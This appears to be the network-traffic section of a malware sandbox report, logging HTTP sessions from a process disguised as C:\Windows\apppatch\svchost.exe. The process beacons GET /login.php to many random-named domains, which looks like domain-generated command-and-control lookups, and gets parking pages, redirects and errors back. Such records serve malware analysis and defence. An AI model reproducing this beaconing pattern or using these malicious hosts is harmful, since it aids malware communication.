                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=12199&sent=12&recv=14&lost=0&retrans=0&sent_bytes=2920&recv_bytes=972&delivery_rate=308478&cwnd=4&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                              Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.8 | 49726 | 3.94.10.34 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:12.751336098 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lygynud.com
Nov 11, 2024 18:33:13.177643061 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:13 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=562a2781670064c155bc5eb58ecb8e88|66.23.206.109|1731346393|1731346393|0|1|0; path=/; domain=.lygynud.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.8 | 49727 | 18.208.156.248 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:12.869266033 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: pupycag.com
Nov 11, 2024 18:33:13.302082062 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:13 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=fec41e04a42a2cb45bfad064cbfb06df|66.23.206.109|1731346393|1731346393|0|1|0; path=/; domain=.pupycag.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.8 | 49728 | 103.150.10.48 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:13.073059082 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lyrysor.com
Nov 11, 2024 18:33:13.859889030 CET | 404 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                              Server: openresty/1.15.8.1
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:13 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 151
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: http://106.15.232.163:8000/dh/147287063_498544.html#index8?d=lyrysor.com
                                                                                                                                                                                                              Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
Nov 11, 2024 18:33:14.694252968 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lyrysor.com
Nov 11, 2024 18:33:14.964091063 CET | 404 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                              Server: openresty/1.15.8.1
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:14 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 151
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: http://106.15.232.163:8000/dh/147287063_498544.html#index8?d=lyrysor.com
                                                                                                                                                                                                              Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
Nov 11, 2024 18:33:38.198591948 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lyrysor.com
Nov 11, 2024 18:33:38.498912096 CET | 404 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                              Server: openresty/1.15.8.1
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:38 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 151
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: http://106.15.232.163:8000/dh/147287063_498544.html#index8?d=lyrysor.com
                                                                                                                                                                                                              Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
Nov 11, 2024 18:33:39.095477104 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lyrysor.com
Nov 11, 2024 18:33:39.381103992 CET | 404 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                              Server: openresty/1.15.8.1
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:39 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 151
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: http://106.15.232.163:8000/dh/147287063_498544.html#index8?d=lyrysor.com
                                                                                                                                                                                                              Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.8 | 49730 | 106.15.232.163 | 8000 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:13.876764059 CET | 290 | OUT | GET /dh/147287063_498544.html HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: 106.15.232.163:8000
                                                                                                                                                                                                              Connection: Keep-Alive
Nov 11, 2024 18:33:14.693023920 CET | 722 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: openresty/1.21.4.3
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:14 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 561
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:33:14.979581118 CET | 290 | OUT | GET /dh/147287063_498544.html HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: 106.15.232.163:8000
                                                                                                                                                                                                              Connection: Keep-Alive
Nov 11, 2024 18:33:15.260277987 CET | 722 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: openresty/1.21.4.3
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:15 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 561
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:33:38.789968967 CET | 290 | OUT | GET /dh/147287063_498544.html HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: 106.15.232.163:8000
                                                                                                                                                                                                              Connection: Keep-Alive
Nov 11, 2024 18:33:39.067097902 CET | 722 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: openresty/1.21.4.3
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:38 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 561
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:33:39.393409967 CET | 290 | OUT | GET /dh/147287063_498544.html HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: 106.15.232.163:8000
                                                                                                                                                                                                              Connection: Keep-Alive
Nov 11, 2024 18:33:39.669028044 CET | 722 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: openresty/1.21.4.3
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:39 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 561
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.8 | 49732 | 76.223.67.189 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:19.191246986 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qexyhuv.com
Nov 11, 2024 18:33:19.619551897 CET | 259 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:19 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 114
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.8 | 49733 | 64.225.91.73 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:19.251180887 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: galynuh.com
Nov 11, 2024 18:33:19.802555084 CET | 816 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                              server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                              date: Mon, 11 Nov 2024 17:33:19 GMT
                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                              content-length: 593
                                                                                                                                                                                                              last-modified: Wed, 22 Feb 2023 21:25:52 GMT
                                                                                                                                                                                                              etag: "63f68860-251"
                                                                                                                                                                                                              accept-ranges: bytes
                                                                                                                                                                                                              Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.8 | 49734 | 103.224.182.252 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:19.493175983 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: vofycot.com
Nov 11, 2024 18:33:20.052227974 CET | 338 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                              date: Mon, 11 Nov 2024 17:33:19 GMT
                                                                                                                                                                                                              server: Apache
                                                                                                                                                                                                              set-cookie: __tad=1731346399.8350699; expires=Thu, 09-Nov-2034 17:33:19 GMT; Max-Age=315360000
                                                                                                                                                                                                              location: http://ww16.vofycot.com/login.php?sub1=20241112-0433-1952-9852-0a12b0cc4551
                                                                                                                                                                                                              content-length: 2
                                                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                              Data Raw: 0a 0a
                                                                                                                                                                                                              Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.8 | 49735 | 103.224.212.210 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:19.494313955 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lyxynyx.com
Nov 11, 2024 18:33:20.062897921 CET | 340 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                              date: Mon, 11 Nov 2024 17:33:19 GMT
                                                                                                                                                                                                              server: Apache
                                                                                                                                                                                                              set-cookie: __tad=1731346399.2937263; expires=Thu, 09-Nov-2034 17:33:19 GMT; Max-Age=315360000
                                                                                                                                                                                                              location: http://ww25.lyxynyx.com/login.php?subid1=20241112-0433-1952-8ae5-52e851fd8a3a
                                                                                                                                                                                                              content-length: 2
                                                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                              Data Raw: 0a 0a
                                                                                                                                                                                                              Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.8 | 49736 | 154.85.183.50 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:19.581151009 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qegyval.com
Nov 11, 2024 18:33:20.393579960 CET | 307 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 11 Nov 2024 17:33:20 GMT
Content-Type: text/html
Content-Length: 138
Connection: keep-alive
ETag: "663ee226-8a"
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Nov 11, 2024 18:33:20.395010948 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qegyval.com
Nov 11, 2024 18:33:20.680514097 CET | 307 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 11 Nov 2024 17:33:20 GMT
Content-Type: text/html
Content-Length: 138
Connection: keep-alive
ETag: "663ee226-8a"
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Nov 11, 2024 18:33:44.227180958 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qegyval.com
Nov 11, 2024 18:33:44.512931108 CET | 307 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 11 Nov 2024 17:33:44 GMT
Content-Type: text/html
Content-Length: 138
Connection: keep-alive
ETag: "663ee226-8a"
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Nov 11, 2024 18:33:46.973695993 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qegyval.com
Nov 11, 2024 18:33:47.258786917 CET | 307 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 11 Nov 2024 17:33:47 GMT
Content-Type: text/html
Content-Length: 138
Connection: keep-alive
ETag: "663ee226-8a"
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.8 | 49737 | 44.221.84.105 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:19.859117985 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gadyciz.com
Nov 11, 2024 18:33:20.307344913 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 17:33:20 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=9dffc4e3d65da5e4a178c6aa9fd52e09|66.23.206.109|1731346400|1731346400|0|1|0; path=/; domain=.gadyciz.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.8 | 49738 | 64.190.63.136 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:20.385684013 CET | 348 | OUT | GET /login.php?sub1=20241112-0433-1952-9852-0a12b0cc4551 HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww16.vofycot.com
Connection: Keep-Alive
Cookie: __tad=1731346399.8350699
Nov 11, 2024 18:33:21.040550947 CET | 1236 | IN | HTTP/1.1 200 OK
date: Mon, 11 Nov 2024 17:33:20 GMT
content-type: text/html; charset=UTF-8
transfer-encoding: chunked
vary: Accept-Encoding
expires: Mon, 26 Jul 1997 05:00:00 GMT
cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
pragma: no-cache
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_k5dBT5cFvbswD4Cz3yCIj/RSaWf0FhfyrHpcGdPOOfdFdrn+prIXR1jn6xr0Qwmio/mHdg42Dza+517xI4y5gw==
last-modified: Mon, 11 Nov 2024 17:33:20 GMT
x-cache-miss-from: parking-7596689c44-bsx5j
server: Parking/1.0
                                                                                                                                                                                                              Data Ascii: 2E2<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_k5dBT5cFvbswD4Cz3yCIj/RSaWf0FhfyrHpcGdPOOfdFdrn+prIXR1jn6xr0Qwmio/mHdg42Dza+517xI4y5gw==><head><meta charset="utf-8"><title>vofycot.com&nbsp;-&nbsp;This website is for sale!&nbsp;-&nbsp;vofycot Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="This website is for sale! vofycot.com is your first and bes
                                                                                                                                                                                                              Data Ascii: nitial;margin:10% auto;padding:40px;background:#fff;display:inline-block;max-width:550px}.cookie-modal-window__content-text{line-height:1.5em}.cookie-modal-window__close{width:100%;margin:0}.cookie-modal-window__content-body table{width:100%;b
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.045277119 CET1236INData Raw: 31 38 38 33 38 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 78 2d 6c 61 72 67 65 7d 2e 62 74 6e 2d 2d 73 75 63 63 65 73 73 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72
                                                                                                                                                                                                              Data Ascii: 18838;border-color:#218838;color:#fff;font-size:x-large}.btn--success:hover{background-color:#1a6b2c;border-color:#1a6b2c;color:#fff;font-size:x-large}.btn--success-sm{background-color:#218838;border-color:#218838;color:#fff;font-size:initial}
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.045291901 CET1236INData Raw: 69 74 63 68 5f 5f 73 6c 69 64 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 37 62 66 66 7d 69 6e 70 75 74 3a 66 6f 63 75 73 2b 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 31
                                                                                                                                                                                                              Data Ascii: itch__slider{background-color:#007bff}input:focus+.switch__slider{box-shadow:0 0 1px #007bff}input:checked+.switch__slider:before{-webkit-transform:translateX(26px);-ms-transform:translateX(26px);transform:translateX(26px)}body{background-colo
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.046979904 CET1236INData Raw: 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 22 2f 2f 69 6d 67 2e 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 74 65 6d 70 6c 61 74 65 73 2f 62 67 2f 61 72 72 6f 77 73 2e 70 6e 67 22 29 20 23 30 65 31 36 32 65 20 6e 6f 2d 72 65 70 65 61 74 20 74
                                                                                                                                                                                                              Data Ascii: ackground:url("//img.sedoparking.com/templates/bg/arrows.png") #0e162e no-repeat top left;backgr720ound-size:94% 640px;flex-grow:1;position:inherit;top:90px;overflow:hidden;-moz-transform:scaleX(-1);-o-transform:scaleX(-1);-webkit-transfor
                                                                                                                                                                                                              Nov 11, 2024 18:33:21.047276020 CET1236INData Raw: 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 68 6f 76 65 72 2c 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73
                                                                                                                                                                                                              Data Ascii: ext-decoration:underline}.two-tier-ads-list__list-element-link:hover,.two-tier-ads-list__list-element-link:active,.two-tier-ads-list__list-element-link:focus{text-decoration:none}.webarchive-block{text-align:center}.webarchive-block__header-li


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.8 | 49739 | 199.59.243.227 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:33:20.413517952 CET | 350 | OUT | GET /login.php?subid1=20241112-0433-1952-8ae5-52e851fd8a3a HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww25.lyxynyx.com
Connection: Keep-Alive
Cookie: __tad=1731346399.2937263
Nov 11, 2024 18:33:20.848814011 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                              date: Mon, 11 Nov 2024 17:33:20 GMT
                                                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                                                              content-length: 1230
                                                                                                                                                                                                              x-request-id: 41dc0dcd-166b-4eb6-a959-38d5d6625e06
                                                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
